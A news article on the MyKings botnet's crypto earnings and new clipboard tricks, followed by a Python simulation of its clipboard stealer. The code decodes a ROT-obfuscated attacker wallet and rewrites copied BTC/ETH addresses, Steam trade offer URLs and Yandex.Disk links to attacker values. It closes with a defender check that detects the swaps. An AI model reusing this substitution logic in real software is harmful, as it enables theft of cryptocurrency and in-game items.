The MyKings botnet (aka Smominru or DarkCloud) is still actively spreading, earning huge sums of money in crypto, five years after it first appeared in the wild.
Being one of the most analyzed botnets in recent history, MyKings is of particular interest to researchers thanks to its vast infrastructure and versatile feature set, including bootkits, miners, droppers, clipboard stealers, etc.
The latest team of researchers to look into MyKings is Avast Threat Labs, which has collected 6,700 unique samples for analysis since early 2020.
During the same period, Avast actively prevented more than 144,000 MyKings attacks against its customers, most of them based in Russia, India and Pakistan.
The botnet uses many cryptocurrency wallet addresses, some of which have quite high balances. Avast believes the cryptocurrency in these wallets was amassed by the clipboard thief and crypto mining components.
The revenue reflected in MyKings-linked wallet addresses is approximately $24.7 million. However, since the botnet uses over 20 cryptocurrencies in total, this amount is only a part of its total financial earnings.
To hide the hard-coded wallet addresses from extraction and analysis, the malware obfuscates them with a simple ROT cipher (a letter rotation, not real encryption). Otherwise, no notable upgrades have been spotted on this front in recent samples.
New URL substitution tricks
Besides wallet address substitution that hijacks transactions, Avast has also spotted a new monetization technique used by MyKings operators involving the Steam gaming platform.
The latest versions of the malware also feature a new URL manipulation routine in the clipboard stealing module, which the attackers built to hijack Steam item trades. The module rewrites the trade offer URL copied by the victim so that the attacker's account becomes the recipient of the trade, stealing in-game items.
Similar functionality has been added for the Yandex.Disk cloud storage service, with MyKings manipulating share links that users send to their contacts.
The modified links point to Yandex storage locations holding RAR or ZIP archives named "photos", which deliver a copy of MyKings to whoever opens them.
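The two mechanisms described above (the ROT-obfuscated hard-coded wallet address, and the clipboard module that swaps cryptocurrency addresses, Steam trade offer links and Yandex.Disk share links) can be illustrated with a small simulation. The code below is an added example written for this page; it is not MyKings code or Avast's analysis tooling. The attacker address, Steam partner/token, Yandex link, regexes and the ROT-13 shift are all hypothetical, the "clipboard" is just a string, and the final function shows the check a defender would make: diff the destinations in what was copied against what is about to be pasted.

```python
"""Simulation of a MyKings-style clipboard hijack (constructed example).

Nothing here touches a real clipboard: every function takes and returns
plain strings, and all attacker-side values are made up for illustration.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def rot_letters(text: str, shift: int) -> str:
    """Rotate ASCII letters by `shift`; digits and symbols are left alone.
    This is the kind of trivial obfuscation used to hide a hard-coded
    wallet address from a string search of the binary."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


# Hypothetical attacker values (constructed; not taken from any real sample).
OBFUSCATED_BTC = "1ObngFYEUgXAatxqKRrboE76o53YRGgclG"   # ROT-13 of the payout address
ATTACKER_BTC = rot_letters(OBFUSCATED_BTC, 13)          # decoded at runtime, as malware would
ATTACKER_ETH = "0x" + "deadbeef" * 5                    # 40 hex chars, placeholder
ATTACKER_STEAM = {"partner": "123456789", "token": "AbCdEfGh"}
ATTACKER_YANDEX = "https://disk.yandex.ru/d/photos-placeholder"  # lure archive link

# Patterns for the clipboard contents the stealer cares about (simplified).
BTC_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
ETH_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")
STEAM_TRADE_RE = re.compile(r"https://steamcommunity\.com/tradeoffer/new/\?\S+")
YANDEX_RE = re.compile(r"https://disk\.yandex\.(?:ru|com)/d/\S+")
DESTINATION_PATTERNS = (
    ("btc", BTC_RE), ("eth", ETH_RE), ("steam", STEAM_TRADE_RE), ("yandex", YANDEX_RE),
)


def hijack_steam_trade(url: str) -> str:
    """Keep the victim's trade offer URL intact except for the two query
    parameters that identify the receiving account."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query))
    query.update(ATTACKER_STEAM)   # partner + token now point at the attacker
    return urlunsplit(parts._replace(query=urlencode(query)))


def hijack_clipboard(text: str) -> str:
    """What the stealer does on each clipboard update: rewrite anything that
    looks like a payment or trade destination so it points at the attacker.
    Text with no recognizable destination is returned unchanged."""
    text = BTC_RE.sub(ATTACKER_BTC, text)
    text = ETH_RE.sub(ATTACKER_ETH, text)
    text = STEAM_TRADE_RE.sub(lambda m: hijack_steam_trade(m.group(0)), text)
    text = YANDEX_RE.sub(ATTACKER_YANDEX, text)
    return text


def find_swapped_destinations(copied: str, pasted: str) -> list:
    """Defender-side check: compare the destinations found in the text the
    user copied with those in the text about to be pasted. Any difference is
    a strong indicator that a clipboard stealer is running."""
    swaps = []
    for kind, pattern in DESTINATION_PATTERNS:
        for before, after in zip(pattern.findall(copied), pattern.findall(pasted)):
            if before != after:
                swaps.append((kind, before, after))
    return swaps


# Constructed sample clipboard contents: a payee address, a Steam trade
# offer link and a Yandex.Disk share link, as a victim might copy them.
SAMPLE_CLIPBOARD = [
    "pay 0.01 BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa",
    "https://steamcommunity.com/tradeoffer/new/?partner=987654321&token=zYxWvUtS",
    "photos from the trip: https://disk.yandex.ru/d/holiday-pics-2021",
]

if __name__ == "__main__":
    for copied in SAMPLE_CLIPBOARD:
        pasted = hijack_clipboard(copied)
        print(f"copied: {copied}\npasted: {pasted}")
        print("swapped:", find_swapped_destinations(copied, pasted), "\n")
```

The address regexes are deliberately loose; a real stealer only needs to catch most addresses, and a defender's check should err on the side of flagging. The comparison in `find_swapped_destinations` is the practical takeaway: on a machine where an address or link you copy is not the one you paste, stop the transaction and treat the host as compromised.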
In 2018, MyKings was growing steadily, with malware reaching 520,000 infections and bringing in millions of dollars to its operators.
Today the botnet appears to have grown further while staying hidden and out of reach of law enforcement.